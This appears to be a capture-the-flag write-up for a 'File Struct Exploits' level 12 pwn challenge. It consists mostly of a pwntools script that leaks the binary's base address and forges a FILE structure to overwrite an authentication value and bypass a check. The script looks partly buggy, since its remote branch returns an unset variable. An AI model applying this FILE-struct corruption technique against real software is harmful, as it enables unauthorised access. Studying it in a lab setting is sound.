(File Struct Exploits) level 12
(File Struct Exploits) level 12
Information
- category: pwn
Description
Apply FILE struct exploits to write data to bypass a security check.
Exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!/usr/bin/env python3
from pwn import *
exe = ELF("./babyfile_level12_patched")
context.terminal = "kitty"
context.binary = exe
def conn():
if args.LOCAL:
global p
p = process([exe.path])
gdb.attach(p)
else:
r = remote("addr", 1337)
return p
def new_note(idx, size):
p.sendlineafter(b"> ", b"new_note")
p.sendlineafter(b"> ", idx)
p.sendlineafter(b"> ", size)
def del_note():
p.sendlineafter(b"> ", b"del_note")
def write_note(idx, data):
p.sendlineafter(b"> ", b"write_note")
p.sendlineafter(b"> ", idx)
p.send(data)
def read_note(idx, data):
p.sendlineafter(b"> ", b"read_note")
p.sendlineafter(b"> ", idx)
p.send(data)
def open_file():
p.sendlineafter(b"> ", b"open_file")
def read_file(idx):
p.sendlineafter(b"> ", b"read_file")
p.sendlineafter(b"> ", idx)
def write_fp(data):
p.sendlineafter(b"> ", b"write_fp")
p.send(data)
def authenticated():
p.sendlineafter(b"> ", b"authenticate")
def quit():
p.sendlineafter(b"> ", b"quit")
def main():
r = conn()
r.recvuntil(b"located at: ")
baself = int(r.recvline()[:-1], 16) - exe.sym["main"]
authenticate = baself + 0x5170
new_note(b"0", b"4")
write_note(b"0", b"AAA")
# read_note(b"0", b"AAA")
open_file()
fp = FileStructure()
fp = fp.read(authenticate, 10)
raw_input("DEBUG")
write_fp(bytes(fp))
read_file(b"0")
r.interactive()
if __name__ == "__main__":
main()
This post is licensed under CC BY 4.0 by the author.